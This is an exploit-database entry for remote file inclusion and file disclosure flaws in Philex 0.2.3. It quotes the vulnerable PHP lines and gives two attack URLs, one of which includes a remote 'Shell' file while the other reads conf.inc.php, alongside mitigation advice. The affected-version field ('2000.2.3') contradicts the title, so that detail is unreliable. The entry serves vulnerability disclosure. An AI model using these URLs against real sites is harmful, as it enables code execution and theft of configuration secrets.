Philex 0.2.3 - exploit.company

vendor:

Philex

by:

GloD_M

7.5

CVSS

HIGH

Remote File Disclosure/Include

CWE

Product Name: Philex

Affected Version From: 2000.2.3

Affected Version To: 2000.2.3

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Philex 0.2.3 <= Remote File(Disclosure/Include)Vulnerabilities

The Philex 0.2.3 version has vulnerabilities that allow remote file disclosure and remote file include. The exploit for remote file include can be triggered by accessing the header.inc.php file with the parameter CssFile set to 'Shell'. The exploit for remote file disclosure can be triggered by accessing the download.php file with the parameter file set to 'conf.inc.php'.

Mitigation:

The vendor should release a patch to fix these vulnerabilities. In the meantime, users are advised to upgrade to a newer version of Philex or implement proper input validation and sanitization to prevent remote file disclosure and include attacks.

Source

Exploit-DB raw data:

######################################################
# Philex 0.2.3 <= Remote File(Disclosure/Include)Vulnerabilities
# D.Script: http://kent.dl.sourceforge.net/sourceforge/philex/philex_0.2.3.tgz
# Discovered by: GloD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
######################################################
# V.Code Include:                                    #
# <?include $CssFile;?>                              #
# Exploit Remote File Include:                       #
# [Path_Philex]/header.inc.php?CssFile=Shell         #
######################################################
# V.Code Disclosure:                                 #
# readfile($HTTP_GET_VARS["file"]);                  #
# Exploit Remote File Disclosure:                    #
# [Path_Philex]/download.php?file=conf.inc.php       #
######################################################

# milw0rm.com [2007-03-23]